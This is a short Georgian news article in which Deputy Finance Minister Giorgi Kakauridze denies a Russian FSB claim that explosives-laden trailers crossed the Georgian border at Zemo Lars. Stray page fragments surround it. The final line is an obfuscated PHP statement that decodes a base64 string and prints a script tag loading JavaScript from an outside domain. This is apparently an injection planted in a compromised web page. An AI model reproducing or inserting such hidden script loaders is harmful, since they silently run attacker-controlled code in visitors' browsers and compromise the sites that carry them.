celsiusi
ავერსი საქკაბელი
„საქართველოს საბაჟო საზღვარი არც ტროტილით და არც სხვა ასაფეთქებელი ნივთიერებებით დატვირთულ ტრაილერს არ გაუვლია“ - ასე უპასუხა ფინანსთა მინისტრის მოადგილე გიორგი კაკაურიძემ ჟურნალისტებს განუცხადა. 
 
რუსეთის უსაფრთხოების ფედერალური სამსახურის ინფორმაციით, ასაფეთქებელი ნივთიერებით დატვირთულმა ტრაილერებმა, რომელიც უკრაინიდან მოემართებოდა, სხვა ქვეყნების საზღვრებთან ერთად რუსეთ - საქართველოს საზღვარი „ზემო ლარსის“ საბაჟოზე გადაკვეთა.
 
ფინანსთა მინისტრის მოადგილემ ეს ინფორმაცია უარყო და განაცხადა, რომ ფაქტის დადასტურების შემთხვევაში, მასზე გამოძიება დაიწყებოდა.
 
„საბაჟო საზღვარი არც ტროტილით და არც სხვა ასაფეთქებელი ნივთიერებებით დატვირთულ ტრაილერს არ გაუვლია. ვინმეს წინაშე არანაირი თავის მართლების ვალდებულება არ მაქვს. თუ ვინმე არგუმენტირებულად დაასაბუთებს, რომ საქართველოს საზღვარი გაიარა, მაგ შემთხვევაში გამოძიებაც დაიწყება და პასუხისმგებელი პირებიც იქნებიან. მე ვიცი, რომ საბაჟო საზღვარი არ გაუვლია. თუ ეს სპეკულაციაა, ამას შესაბამისმა სამსახურებმა უნდა უპასუხონ. მე გეუბნებით, რომ საბაჟო სამსახურს თავისი მოვალეობის შესრულებაში ეს პროცედურები კარგად აქვს გაწერილი და მსგავსი შემთხვევა არ ყოფილა“, - განაცხადა კაკაურიძემ.
517
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");